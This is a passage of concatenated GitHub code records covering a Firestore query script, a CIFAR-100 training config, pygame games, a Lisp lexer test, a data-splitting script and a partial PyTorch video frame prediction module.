(\"ProblemSize\", \"Calls\"))\n\tfor count in range(5):\n\t\tcounter = Counter()\n\n\t\t# The start of the algorithm\n\t\tfib(problemSize, counter)\n\t\t# End of the algorithm\n\t\tprint(\"%12s%15s\" % (problemSize, counter))\n\t\tproblemSize *= 2\n\n\n# Insertion Sort Algorithm #\na = []\nfor i in range(20):\n\ta.append(random.randrange(1, 100, 1))\n\ta.sort()\n\tprint(a)","repo_name":"CLima86/CTCI_Rep","sub_path":"fund_python.py","file_name":"fund_python.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4057785061","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport logging\nimport urllib3\nfrom google.cloud.firestore_v1.base_query import BaseQuery\n\nhttp = urllib3.PoolManager()\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\ncred = credentials.Certificate(\"./auth.json\")\nfirebase_admin.initialize_app(cred, {\n 'projectId': \"food-haccp\",\n})\ndb = firestore.client()\n\ndocs1 = db.collection(u'items')\\\n .where(u'prdkind', u'==', u'커피')\\\n .order_by(u'prdlstNm', direction=BaseQuery.ASCENDING)\\\n .limit(10)\\\n .stream()\n\nfor doc in docs1:\n print(f'{doc.id} => {doc.to_dict()}')\n\nprint(\"--------------\")\n\ndocs2 = db.collection(u'items')\\\n .where(u'prdkind', u'==', u'커피')\\\n .order_by(u'prdlstNm', direction=BaseQuery.ASCENDING) \\\n .limit(5) \\\n .stream()\n\nfor doc in docs2:\n print(f'{doc.id} => {doc.to_dict()}')\n\nprint(\"--------------\")\n\nlast_doc = list(docs2)[-1]\nlast_pop = last_doc.to_dict()[u'prdlstNm']\n\ndocs3 = db.collection(u'items')\\\n .where(u'prdkind', u'==', u'커피')\\\n .order_by(u'prdlstNm', direction=BaseQuery.ASCENDING)\\\n .start_after({u'prdlstNm': last_pop})\\\n .limit(5) \\\n .stream()\n\nfor doc in docs3:\n print(f'{doc.id} => {doc.to_dict()}')\n","repo_name":"pari0130/firebase-code","sub_path":"firebase-get-v1.py","file_name":"firebase-get-v1.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72887093847","text":"# File Name : cifar100_resnet.py\n# Purpose : Cifar100 training on tiles\n# Creation Date : 01-05-2022\n# Last Modified : \n# Created By : \n\nimport torch.nn as nn\nfrom torch import optim\nimport numpy as np\nimport torch\n\nfrom data_loader import get_dataloaders\nfrom models import resnet9, resnet_cifar\n\nfrom pytorch_trainer import Trainer\nfrom pytorch_trainer.metric import Accuracy\n\n### General hyper-parameters\ngeneral_options = {\n 'use_cuda' : True, # use GPU ?\n 'use_tensorboard' : True, # Use Tensorboard for saving hparams and metrics ?\n 'tensorboard_weight_hist': False # If save the histogram of model's weight at each epoch\n}\n\n### Training hyper-parameters\ntrainer_args = {\n 'epochs' : 400,\n 'loss_fn' : nn.CrossEntropyLoss, ## must be of type nn.Module\n 'optimizer' : optim.Adam,\n 'loss_fn_kwargs': {},\n 'optimizer_kwargs' : {'lr' : 0.002, 'weight_decay':1e-4},\n 'lr_scheduler' : optim.lr_scheduler.MultiStepLR, \n 'lr_scheduler_kwargs' : {'milestones':[40, 80, 100, 150, 200, 250, 300], 'gamma':0.5},\n 'metric': Accuracy, ## must be of type metric.Metric or its derived\n 'metric_kwargs': {},\n 'save_best' : True,\n 'save_location' : './saved_models',\n 'save_name' : 'cifar100_cropped_18_resnet9_2',\n 'continue_training_saved_model' : None,\n}\n\ndataloader_args = {\n 'dataset': 'cifar100',\n 'batch_size' : 256,\n 'shuffle' : True, \n 'num_workers': 12,\n 'crop_size': 18\n}\n\nnetwork_args = {\n # 'pretrained': False,\n 'num_classes': 100,\n 'blocks':2,\n 'freeze_block1':None\n}\n\nexperiment_summary = 'Training resnet9 on 18x18 CIFAR-100 images 2nd run'\n\nif __name__ == '__main__':\n trainer = Trainer('cifar100_cropped_18_resnet9_2', general_options, experiment_summary=experiment_summary)\n trainer.initialize_dataloaders(get_dataloaders, **dataloader_args)\n trainer.build_model(resnet9.IncrementalResnet9, **network_args)\n #trainer.model.load_state_dict(torch.load('saved_models/cifar10_cropped_resnet_16_best.pth')['state_dict'])\n # trainer.model.to(trainer.device)\n trainer.train(**trainer_args)\n","repo_name":"vamshichowdary/cod-cnn","sub_path":"tiled_training.py","file_name":"tiled_training.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43145359819","text":"import time\nfrom turtle import Screen\n\nfrom player import Player\nfrom score import Score\nfrom traffic import Traffic\nfrom display import Display\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\ngame_is_on = True\n\nplayer = Player()\nscore = Score()\ntraffic = Traffic()\ndisplay = Display()\n\nis_game_paused = False\n\n\ndef pause_game():\n global is_game_paused\n is_game_paused = not is_game_paused\n\n\nscreen.listen()\nscreen.onkey(key=\"Up\", fun=player.up)\nscreen.onkey(key=\"Down\", fun=player.down)\nscreen.onkey(key=\"Left\", fun=player.left_turn)\nscreen.onkey(key=\"Right\", fun=player.right_turn)\nscreen.onkey(key=\"space\", fun=pause_game)\n\n\nwhile game_is_on:\n\n if not is_game_paused:\n display.display_status(is_game_paused)\n time.sleep(0.1)\n screen.update()\n\n traffic.create_car()\n traffic.move_cars()\n\n # Detect Collision with Car\n for car in traffic.traffic_list:\n if car.distance(player) < 20:\n game_is_on = False\n score.show_game_over()\n\n # Detect Level Completion\n if player.ycor() > 250:\n score.increase_score()\n if score.level > score.highest_level:\n score.update_score()\n player.return_to_start()\n traffic.level_up()\n else:\n display.display_status(is_game_paused)\n\nscreen.exitonclick()\n","repo_name":"Ishan2608/Crossing-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2348031648","text":"import pygame\nfrom pygame.locals import *\nimport numpy as np\nimport os #Used for creating directories\nimport getpass #Used for getting the user's username, needed for choosing the directory of save files\nfrom datetime import datetime #Getting the current date and time as understood by humans (rather than UNIX time)\n\nfrom textbox import TextBox\nfrom msgbox import MessageBox\nfrom cls_offline import *\nfrom button import Button\nfrom lib import getFileLines, CreateTitleDeed, CreateMortDeed, getCardEffects\n\n#------------------------------New Game Functions------------------------------\ndef countNames(boxes): #Counts how many of the available 6 boxes have had something entered into them\n counter = 0\n for t_box in boxes:\n if len(t_box.getContents()) > 0:\n counter += 1\n return counter\n\ndef lengthsValid(boxes): #Checks that none of the names entered have more than 12 characters\n for t_box in boxes:\n if len(t_box.getContents()) > 12: #Maximum allowed length of a username is 12 characters\n return False\n return True\n\ndef namesDuplicate(boxes):\n #Cycles through all pairings of username boxes to check for duplication\n for outer in range(5,-1,-1): #Iterates from 5 to 0\n for inner in range(outer): #Iterates up to outer-1\n #Checks a box is being compared with itself and that both actually have a name in them\n if inner != outer and len(boxes[outer].getContents()) > 0 and len(boxes[inner].getContents()) > 0:\n #Username comparison not case-sensitive as allowing both LEE and Lee could lead to confusion\n if boxes[outer].getContents().lower() == boxes[inner].getContents().lower():\n return True\n return False\n\ndef containsComma(boxes):\n for t_box in boxes:\n if \",\" in t_box.getContents():\n return True\n return False\n\ndef namesValid(boxes):\n #Must be at least 2 names entered (as game cannot be played with fewer than 2 players\n #No duplicate names and usernames 12 characters or less as they will not be able to be displayed in an aesthetically pleasing way on screen later otherwise\n if namesDuplicate(boxes) or lengthsValid(boxes) == False or countNames(boxes) < 2 or containsComma(boxes):\n return False\n else:\n return True\n\ndef createPlayers(p_icons, boxes, board_dim, data_file_path): #Create Player objects using the names entered into text boxes and the corresponding icons\n fh = open(data_file_path, \"r\")\n init_mon = int(fh.readline())\n fh.close()\n \n player_temp = Player(0, None, 0, \"\")\n new_players = np.array([None] * countNames(boxes))\n p_counter = 0 #Stores which element in the new_players array is next to be instantiated\n for b_counter in range(6):\n if len(boxes[b_counter].getContents()) > 0: #Name must have been entered for a player to come into existence\n p_piece = Player_Piece(player_temp.calcPieceX(0, board_dim/768), player_temp.calcPieceY(0, board_dim/768), pygame.transform.smoothscale(p_icons[b_counter], [32, 32]), b_counter) #Create piece separately\n new_players[p_counter] = Player(init_mon, p_piece, 0, boxes[b_counter].getContents()) #Now create player. 1500 is the money and 0 is the initial board position\n p_counter += 1\n return new_players\n\n#Create the decks of Pot Luck and Council Chest cards, based off of data and images loading in from external files\ndef createDeck(deck_name, card_base_path, card_texts_path, card_data_path, deck_size):\n deck_cards = np.array([None] * deck_size) #Array of blank objects; will become array of individual Card objects\n card_effects = getCardEffects(card_texts_path)\n card_img = None #Blank object, later to become loaded-in pygame images\n text_line = \"\"\n\n fh = open(card_data_path, \"r\")\n for counter in range(deck_size): #Iterate up to deck_size-1\n card_img = pygame.transform.smoothscale(pygame.image.load(card_base_path + str(counter + 1) + \".png\"), [330, 200]) #Images are named \"Pot Luck 1.png\", for example. N.B. Numbering starts at one, hence the +1\n text_line = fh.readline()\n data_array = np.array(text_line.split(\",\")) #Values are comma-separated in the external file\n for d_count in range(len(data_array)): #Convert each of the elements in the array from String (as they will be coming from an external file) to numbers\n data_array[d_count] = int(data_array[d_count])\n \n deck_cards[counter] = Card(deck_name, card_img, card_effects, data_array)\n fh.close()\n\n ret_deck = Card_Deck(deck_cards)\n ret_deck.shuffleCards() #Randomly arrange the array of cards such that they will not be the same during every game\n return ret_deck\n\n#Creates an array of properties using data from a data file at the start of the game\ndef LoadProperties(file_path):\n property_arr = np.array([None]*40) #Partition numpy array with 40 elements\n fh = open(file_path, \"r\") #Opens the sequential file for reading\n for counter in range(40): #40 properties\n propType = int(fh.read(2)[:1]) #Reads in the first two characters in a line (one number and a separating comma) and then takes the first character. This leaves propType being an integer determining which type of property the line is for\n line_text = fh.readline() #Read in the rest of the line, where all data is for a single property\n prop_values = np.array(line_text.split(\",\")) #Transforms the string into an array where each comma-separated item is an indivual element\n\n if propType == 0: #Most common property type\n property_arr[counter] = Normal_Property(prop_values, CreateTitleDeed(prop_values), CreateMortDeed(prop_values[0], int(prop_values[10])*1.2))\n elif propType == 1: #School (requires crest image for title deed)\n property_arr[counter] = School_Property(prop_values, pygame.image.load(\"img/Deeds/\" + str(prop_values[0]) + \".png\"), CreateMortDeed(prop_values[0], int(prop_values[6])*1.2))\n elif propType == 2: #Stations (requires crest image for title deed)\n property_arr[counter] = Station_Property(prop_values, pygame.image.load(\"img/Deeds/\" + str(prop_values[0]) + \".png\"), CreateMortDeed(prop_values[0], int(prop_values[4])*1.2))\n elif propType == 3: #Pot Luck card spot\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.POT_LUCK)\n elif propType == 4: #Council Chest card spot\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.COUNCIL_CHEST)\n elif propType == 5: #Lost In Bogside spot\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.LOST_IN_BOGSIDE)\n elif propType == 6: #Go To Bogside space\n property_arr[counter] = Go_To_Bogside(prop_values[0].strip(), prop_values[1])\n elif propType == 7: #Property that incurs a charge when landed upon\n property_arr[counter] = Charge_Property(prop_values[0].strip(), prop_values[1])\n elif propType == 8: #Job Centre where the player collects money when passing it\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.JOB_CENTRE)\n elif propType == 9: #Disabled Parking - Does nothing as of yet (and it probably never will)\n property_arr[counter] = Property(prop_values[0].strip(), Prop_Type.DISABLED_PARKING)\n fh.close()\n return property_arr #Array of 40 Property (or subclass) objects\n\n#Create the Board object that will become part of the Game class later\ndef createBoard(data_file_path, props_arr, Pot_Luck, Council_Chest, image_path, image_dim):\n fh = open(data_file_path, \"r\")\n bog_pos = int(fh.readline()) #Board position of what would be the jail\n centre_mon = int(fh.readline()) #Money obtained upon passing the Job Centre\n fh.close()\n\n board_img = pygame.image.load(image_path) #Load and resize board image\n board_img = pygame.transform.smoothscale(board_img, [image_dim, image_dim])\n scale_f = image_dim/768 #Used in piece positioning - formulae were created for a 768x768 board\n\n ret_board = Board(props_arr, bog_pos, centre_mon, Pot_Luck, Council_Chest, board_img, scale_f)\n return ret_board\n\n#Create the final Game object - this is the main point of the New Game screen\ndef createGame(game_players, game_board, game_save, dice_imgs_base_paths):\n dice_imgs = np.array([None] * 6)\n for d_count in range(6):\n dice_imgs[d_count] = pygame.image.load(dice_imgs_base_paths + str(d_count+1) + \".png\") #+1 as dice images are stored with numbers 1 to 6 in the file\n dice_arr = np.array([None] * 2)\n dice_arr[0] = Die(dice_imgs)\n dice_arr[1] = Die(dice_imgs)\n\n ret_game = Game(game_players, dice_arr, game_board, game_save)\n return ret_game\n\n#Create an array of game players based on data loaded in from a file\ndef LoadPlayers(load_arr):\n new_players = np.array([None] * int(load_arr[0][1])) #load_arr[0][1] stores the number of players\n player_temp = Player(0, None, 0, \"\")\n for counter in range(len(new_players)):\n p_piece = Player_Piece(player_temp.calcPieceX(int(load_arr[counter+1][2]), 600/768), player_temp.calcPieceY(int(load_arr[counter+1][2]), 600/768), pygame.transform.smoothscale(pygame.image.load('img/Pieces/' + str(int(load_arr[counter+1][3])+1) + '.png'), [32, 32]), int(load_arr[counter+1][3])) #Create piece separately. load-arr[counter+1][3] stores a number from 0-5 relating to which of the token images is used (1.png - 6.png)\n new_players[counter] = Player(int(load_arr[counter+1][1]), p_piece, int(load_arr[counter+1][2]), load_arr[counter+1][0], bool(int(load_arr[counter+1][8])), bool(int(load_arr[counter+1][7]))) #Second element (not [counter+1]) is related to the order in which the data was saved, which can be seen in Game.saveGame method\n new_players[counter].hasBogMap = bool(int(load_arr[counter+1][4])) #Relevant element of this array\n new_players[counter].nextRollMod = int(load_arr[counter+1][5]) #Final player attributes being restored\n new_players[counter].turnsToMiss = int(load_arr[counter+1][6])\n return new_players\n\n\n#------------------------------New Game Method------------------------------ \ndef NewGame(screen, clock):\n mainGame = None #Create new object that will eventually become a Game object\n pieces = np.array([None] * 6) #Array to store the 6 images for the player icons that will be linked to the textboxes\n for p_counter in range(6):\n pieces[p_counter] = pygame.transform.smoothscale(pygame.image.load(\"img/Pieces/\" + str(p_counter+1) + \".png\"), [50, 50]) #Load image into pygame and resize\n\n box_arr = np.array([None] * 6) #Array of 6 textboxes - one to one correspondence with the elements of the pieces array\n for b_counter in range(6):\n #Indices related to location on screen:\n #0 1\n #2 3\n #4 5\n #Additional kwargs allow for control over additional behaviour/functionality, much of which is never utilised in this game\n box_arr[b_counter] = TextBox((100 + 500*(b_counter%2), 175 + 55*int(b_counter/2), 380, 50), clear_on_enter=False, inactive_on_enter=False, active=False, active_color=pygame.Color(\"red\"))\n save_path_box = TextBox((340, 550, 640, 50), clear_on_enter=False, inactive_on_enter=False, active=False, active_color=pygame.Color(\"red\"))\n\n now = datetime.now()\n #Save file name is in the form YYYYMMDD_HHMMSS.dfo\n month = '0' + str(now.month)\n day = '0' + str(now.day)\n hour = '0' + str(now.hour)\n minute = '0' + str(now.minute)\n second = '0' + str(now.second)\n \n save_initial = os.path.dirname(os.path.abspath(__file__)) + '/saves/' + str(now.year) + month[-2:] + day[-2:] + '_' + hour[-2:] + minute[-2:] + second[-2:] + '.dfo'\n \n #save_initial = 'C:/Users/' + getpass.getuser() + '/Dunfermline-opoly/' + str(now.year) + month[-2:] + day[-2:] + '_' + hour[-2:] + minute[-2:] + second[-2:] + '.dfo'\n save_path_box.buffer = list(save_initial)\n\n font_48 = pygame.font.SysFont('Arial', 48) #Fonts used for texts\n font_60 = pygame.font.SysFont('Arial', 60)\n\n new_game_title = font_60.render(\"New Game:\", True, (0,0,0))\n icon_title = font_48.render(\"Enter Player Names (max 12 characters)\", True, (0,0,0))\n save_title = font_48.render(\"Save File Path:\", True, (0,0,0))\n\n new_buts = [Button(150, 650, 300, 80, 'Create Game', font_60), #Create Game\n Button(600, 650, 300, 80, 'Load Game', font_60), #Load Game\n Button(870, 20, 120, 70, 'Exit', font_48), #Exit\n Button(935, 100, 55, 55, '?', font_48)] #Info\n\n msgBox = None\n \n screen_running = True\n while screen_running:\n for event in pygame.event.get():\n if msgBox != None:\n msgBox.handle_input_event(event)\n if msgBox.should_exit == False:\n break\n if event.type == pygame.QUIT:\n screen_running = False\n gotoScreen = -1\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE: #Escape key exits the game\n screen_running = False\n gotoScreen = -1 #Game will completely exit\n\n for but in new_buts:\n but.handle_input_event(event)\n for box in box_arr: \n box.get_event(event) #Function that allows each textbox to register key presses and the like\n save_path_box.get_event(event)\n \n\n screen.fill((255,255,255)) #Clear the screen\n\n for but in new_buts: #Display buttons\n but.render(screen)\n\n #Display pure text aspects of the screen\n screen.blit(new_game_title, [10, 10])\n screen.blit(icon_title, [30, 75])\n screen.blit(save_title, [50, 545])\n \n for box in box_arr:\n box.update() #To do with internal workings - take clicks, key pressed etc. into account\n box.draw(screen) #Display the boxes on screen - one of the TextBox classes methods \n save_path_box.update() #Do the same as above but for the object that is not part of the array\n save_path_box.draw(screen)\n\n for piece_count in range(6): #Display the 6 pieces on screen to the left of the relevant text box\n screen.blit(pieces[piece_count], [45 + 500*(piece_count%2), 175 + 55*int(piece_count/2)])\n\n if new_buts[3].clicked():\n msgBox = MessageBox(screen, 'Bottle: A common and very possibly-alcoholic beverage enjoyed often enjoyed by Dunfermine residents (only those over 18 of course). \\n Can: A popular soft drink that definitely does not infringe upon any Intellectual Property Rights. \\n Coal: Coal mining was a prosperous (albeit dangerous) industry for hundreds of years in the Dunfermline and Fife area. \\n Crown: Dunfermline is a royal burgh. \\n Badly-drawn Sheep: Sheep farming is very common in the Dunfermline area. \\n Battleship: Dunfermline is situated near to the Royal Navy dockyard in Rosyth.', 'Token Info')\n\n if new_buts[2].clicked():\n screen_running = False\n gotoScreen = -1\n\n if new_buts[0].clicked(): #If button to create the game itself was clicked\n valid = True #Whether the file part of the process is alright\n if save_path_box.getContents()[-3:].lower() != \"dfo\": #Must have correct file ending, or invalid\n msgBox = MessageBox(screen, 'Invalid file. Please ensure the entered file has the correct .dfo file ending.', 'File Error')\n valid = False\n\n if valid: \n try:\n os.makedirs(os.path.dirname(save_path_box.getContents()), exist_ok=True)\n f = open(save_path_box.getContents(), 'w+')\n except: #Any error occurs in creating the directory or file\n msgBox = MessageBox(screen, 'Invalid save file entered. Please ensure the path entered exists and you have permissions to access it (the file does not have to)', 'Invalid Save File')\n valid = False\n\n if valid:\n if namesValid(box_arr): #Validate the player's username\n players = createPlayers(pieces, box_arr, 600, \"data/Player_Data.txt\") #Create array of Player objects\n prop_arr = LoadProperties(\"data/Property Values.txt\") #Create array of Property objects\n Pot_Luck_Deck = createDeck(\"Pot Luck\", \"img/PL/Pot Luck \", \"data/Card_Texts.txt\", \"data/PL Master.txt\", 16) #Create Card_Deck object\n Council_Chest_Deck = createDeck(\"Council Chest\", \"img/CC/Council Chest \", \"data/Card_Texts.txt\", \"data/CC Master.txt\", 16) #Create Card_Deck object\n game_board = createBoard(\"data/Board_Data.txt\", prop_arr, Pot_Luck_Deck, Council_Chest_Deck, \"img/Board.png\", 600) #Create Board object\n\n mainGame = createGame(players, game_board, save_path_box.getContents(), \"img/Dice/\") #Finally create the single, cohesive Game object that is the sole purpose of this screen/part of the game\n \n screen_running = False\n gotoScreen = 1 #1=Main game screen\n else:\n msgBox = MessageBox(screen, 'The names you entered are invalid. Please ensure all names are 12 characters or less, different (this part is not case-sensitive) and you have entered at least two user names', 'Invalid Usernames') \n\n if new_buts[1].clicked():\n valid = True\n if save_path_box.getContents()[-3:].lower() != \"dfo\": #Must have correct file ending, or invalid\n msgBox = MessageBox(screen, 'Invalid file. Please select a different file or create a new game', 'File Error')\n valid = False\n \n try:\n f = open(save_path_box.getContents(), 'r')\n except: #If an error occurs, then also invalid\n msgBox = MessageBox(screen, 'Cannot open file. Please select a different file or create a new game', 'File Error')\n valid = False\n\n if valid:\n data_arr = []\n for line in f:\n data_arr.append(line.strip().split(','))\n data_arr = np.array(data_arr, dtype=object)\n \n players = LoadPlayers(data_arr) \n prop_arr = LoadProperties(\"data/Property Values.txt\") #Create array of Property objects\n Pot_Luck_Deck = createDeck(\"Pot Luck\", \"img/PL/Pot Luck \", \"data/Card_Texts.txt\", \"data/PL Master.txt\", 16) #Create Card_Deck object\n Council_Chest_Deck = createDeck(\"Council Chest\", \"img/CC/Council Chest \", \"data/Card_Texts.txt\", \"data/CC Master.txt\", 16) #Create Card_Deck object\n game_board = createBoard(\"data/Board_Data.txt\", prop_arr, Pot_Luck_Deck, Council_Chest_Deck, \"img/Board.png\", 600) #Create Board object\n\n for counter in range(int(data_arr[0][1])+1, len(data_arr)):\n if game_board.getProp(int(data_arr[counter][0])).prop_type == Prop_Type.NORMAL:\n game_board.getProp(int(data_arr[counter][0])).buyProperty(int(data_arr[counter][1]))\n game_board.getProp(int(data_arr[counter][0])).C_Houses = int(data_arr[counter][2])\n game_board.getProp(int(data_arr[counter][0])).T_Blocks = int(data_arr[counter][3])\n game_board.getProp(int(data_arr[counter][0])).mortgage_status = bool(int(data_arr[counter][4]))\n elif game_board.getProp(int(data_arr[counter][0])).prop_type == Prop_Type.STATION or game_board.getProp(int(data_arr[counter][0])).prop_type == Prop_Type.SCHOOL:\n game_board.getProp(int(data_arr[counter][0])).buyProperty(int(data_arr[counter][1]))\n game_board.getProp(int(data_arr[counter][0])).mortgage_status = bool(int(data_arr[counter][2]))\n \n mainGame = createGame(players, game_board, save_path_box.getContents(), \"img/Dice/\") #Finally create the single, cohesive Game object that is the sole purpose of this screen/part of the game\n mainGame.cur_player = int(data_arr[0][0]) #Positions in array as per the order of saving, which can be seen in the method within the Game class\n mainGame.autosave = bool(int(data_arr[0][2]))\n \n screen_running = False\n gotoScreen = 1 #1=Main game screen \n \n if msgBox != None:\n msgBox.update()\n if msgBox.should_exit == False:\n msgBox.draw(screen)\n\n clock.tick(30) #30 fps\n pygame.display.flip() #Refresh screen\n\n return mainGame, gotoScreen #Pass the Game object and the integer storing where the game will go to next back out to the main game loop\n","repo_name":"lee-suddaby/Dunfermline-opoly-networked","sub_path":"new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":21050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4534716509","text":"import io\nimport unittest\n\nfrom noname import tokenize\n\n\nclass TestLexer(unittest.TestCase):\n def to_char_stream(self, string):\n for c in string:\n yield c\n\n def test_easy(self):\n source = self.to_char_stream('(+ 1 2')\n result = list(tokenize(source))\n tokens = ['(', '+', '1', '2']\n self.assertEqual(tokens, result)\n\n def test_simple(self):\n source = self.to_char_stream('(is-geonu? \"Geonu Choi\" 24 173.2 true)')\n result = list(tokenize(source))\n tokens = ['(', 'is-geonu?', '\"Geonu Choi\"', '24', '173.2', 'true', ')']\n self.assertEqual(tokens, result)\n\n def test_whitespace(self):\n source = self.to_char_stream(' ( is-geonu?\"Geonu Choi\" 24 173.2 \\'true)')\n result = list(tokenize(source))\n tokens = ['(', 'is-geonu?', '\"Geonu Choi\"', '24', '173.2', \"'\",\n 'true', ')']\n self.assertEqual(tokens, result)\n\n def test_nested(self):\n source = self.to_char_stream('(defn positive? (x) (if (> x 0) true false))')\n result = list(tokenize(source))\n tokens = ['(', 'defn', 'positive?',\n '(', 'x', ')',\n '(', 'if', '(', '>', 'x', '0', ')', 'true', 'false', ')',\n ')']\n self.assertEqual(tokens, result)\n\n def test_complex_string(self):\n expected = r'\"Complex \\n-string\\\"\"'\n source = self.to_char_stream(expected)\n result = list(tokenize(source))\n self.assertEqual([expected], result)\n\n def test_escape_string(self):\n expected = r'\"escape\\\\\"'\n source = self.to_char_stream(expected)\n result = list(tokenize(source))\n self.assertEqual([expected], result)\n\n def test_stream(self):\n def to_char_stream(stream):\n for line in stream:\n for c in line:\n yield c\n\n stream = io.StringIO()\n token_stream = tokenize(to_char_stream(stream))\n\n stream.write('(12 \"foo\" + 12 11 \"foo\" 11 ')\n stream.seek(0)\n\n self.assertEqual('(', next(token_stream))\n self.assertEqual('12', next(token_stream))\n self.assertEqual('\"foo\"', next(token_stream))\n self.assertEqual('+', next(token_stream))\n self.assertEqual('12', next(token_stream))\n self.assertEqual('11', next(token_stream))\n self.assertEqual('\"foo\"', next(token_stream))\n self.assertEqual('11', next(token_stream))\n try:\n next(token_stream)\n except StopIteration:\n pass\n else:\n assert False, \"StopIteration not occurred\"\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"imtherealk/noname","sub_path":"tests/test_lexer.py","file_name":"test_lexer.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21932625157","text":"import random\nfrom argparse import ArgumentParser\n\n\ndef split_data_file(\n input_file,\n train_file: str = \"train.txt\",\n val_file: str = \"val.txt\",\n val_split: float = 0.3,\n seed: int | None = None,\n):\n # Set the random seed for reproducibility\n random.seed(seed)\n\n # Read the input file\n with open(input_file, \"r\") as f:\n lines = f.readlines()\n\n # Shuffle the lines randomly\n random.shuffle(lines)\n\n # Calculate the number of lines for validation set\n num_val = int(len(lines) * val_split)\n\n # Split the lines into train and validation sets\n train_lines = lines[num_val:]\n val_lines = lines[:num_val]\n\n # Write the train lines to train file\n with open(train_file, \"w\") as f:\n f.writelines(train_lines)\n\n # Write the validation lines to validation file\n with open(val_file, \"w\") as f:\n f.writelines(val_lines)\n\n\nif __name__ == \"__main__\":\n # Create an argument parser\n parser = ArgumentParser(\n description=\"Split a data file into train and validation files\"\n )\n\n # Add the arguments\n parser.add_argument(\n \"--input-file\", \"-i\", type=str, help=\"Path to the input data file\"\n )\n parser.add_argument(\n \"--train-file\",\n type=str,\n default=\"train.txt\",\n help=\"Output path to the train file\",\n )\n parser.add_argument(\n \"--val-file\",\n type=str,\n default=\"val.txt\",\n help=\"Output path to the validation file\",\n )\n parser.add_argument(\n \"--val-split\", type=float, default=0.3, help=\"Validation split ratio\"\n )\n parser.add_argument(\n \"--seed\", type=int, default=123, help=\"Random seed for reproducibility\"\n )\n\n # Parse the arguments\n args = parser.parse_args()\n\n # Call the split_data_file function\n split_data_file(\n args.input_file, args.train_file, args.val_file, args.val_split, args.seed\n )\n","repo_name":"bwconrad/video-classification","sub_path":"scripts/split_data.py","file_name":"split_data.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1461450773","text":"# Shree KRISHNAya Namaha\n#\n# Author: Nagabhushan S N\n# Last Modified: 26/08/2022\n\nimport time\nimport datetime\nimport traceback\nfrom collections import OrderedDict\n\nimport numpy\nimport skimage.io\nimport skvideo.io\nimport pandas\nimport simplejson\n\nfrom pathlib import Path\nfrom tqdm import tqdm\nfrom matplotlib import pyplot\nimport torch\nimport torch.nn.functional as F\n\nfrom utils import MpiUtils, CommonUtils\nfrom utils.WarperPytorch import Warper\n\nthis_filepath = Path(__file__)\nthis_filename = this_filepath.stem\n\n\nclass FramePredictor(torch.nn.Module):\n def __init__(self, configs: dict, feature_extractor, local_flow_estimator, local_flow_predictor, \n infilling_flow_predictor):\n super().__init__()\n self.configs = configs\n self.feature_extractor = feature_extractor\n self.local_flow_estimator = local_flow_estimator\n self.local_flow_predictor = local_flow_predictor\n self.infilling_flow_predictor = infilling_flow_predictor\n self.warper = Warper(configs['device'])\n self.num_mpi_planes = self.configs['frame_predictor']['num_mpi_planes']\n self.num_pred_frames = self.configs['frame_predictor']['num_pred_frames']\n self.num_infilling_iterations = self.configs['frame_predictor']['num_infilling_iterations']\n self.device = CommonUtils.get_device(configs['device'])\n return\n\n def forward(self, input_batch: dict, return_intermediate_results: bool = False):\n b, c, h, w = input_batch['frame1'].shape\n min_depth = input_batch['depth1'].reshape((b, h*w)).min(dim=1)[0]\n max_depth = torch.clip(input_batch['depth1'].reshape((b, h*w)).max(dim=1)[0], min=0, max=1000)\n depth1_planes = MpiUtils.get_depth_planes_tr(self.num_mpi_planes, min_depth, max_depth)\n warper_inputs = {\n 'frame1': input_batch['frame0'],\n 'depth1': input_batch['depth0'],\n 'transformation1': input_batch['transformation0'],\n 'transformation2': input_batch['transformation1'],\n 'intrinsic1': input_batch['intrinsic0'],\n 'intrinsic2': input_batch['intrinsic1'],\n 'depth2_planes': depth1_planes,\n }\n warper_outputs = self.warper.forward_warp_frame2mpi(warper_inputs)\n warped_mpi0_rgb = warper_outputs['warped_mpi2_rgb']\n warped_mpi0_alpha = warper_outputs['warped_mpi2_alpha']\n\n mpi1_alpha, mpi1_depth_planes, mpi1_rgb = MpiUtils.create_mpi_tr(input_batch['depth1'], depth1_planes,\n [input_batch['frame1']])\n\n # Estimate past local flow\n flow_inputs = {\n 'mpi0_rgb': warped_mpi0_rgb,\n 'mpi0_alpha': warped_mpi0_alpha,\n 'mpi1_rgb': mpi1_rgb,\n 'mpi1_alpha': mpi1_alpha,\n 'depth1_planes': mpi1_depth_planes,\n }\n with torch.cuda.amp.autocast():\n flow_outputs = self.estimate_past_local_flow(flow_inputs)\n local_mpi_flow10 = flow_outputs['local_mpi_flow10']\n # local_mpi_flow10_mask = flow_outputs['local_mpi_flow10_mask']\n local_flow10, local_flow10_mask = MpiUtils.alpha_compositing(local_mpi_flow10, mpi1_alpha)\n\n output_batch = {\n 'predicted_frames': [],\n 'predicted_frames_mask': [],\n }\n\n # Delete redundant tensors to free memory\n del warped_mpi0_rgb, warped_mpi0_alpha, mpi1_depth_planes, local_flow10_mask\n\n for i in range(self.num_pred_frames):\n # 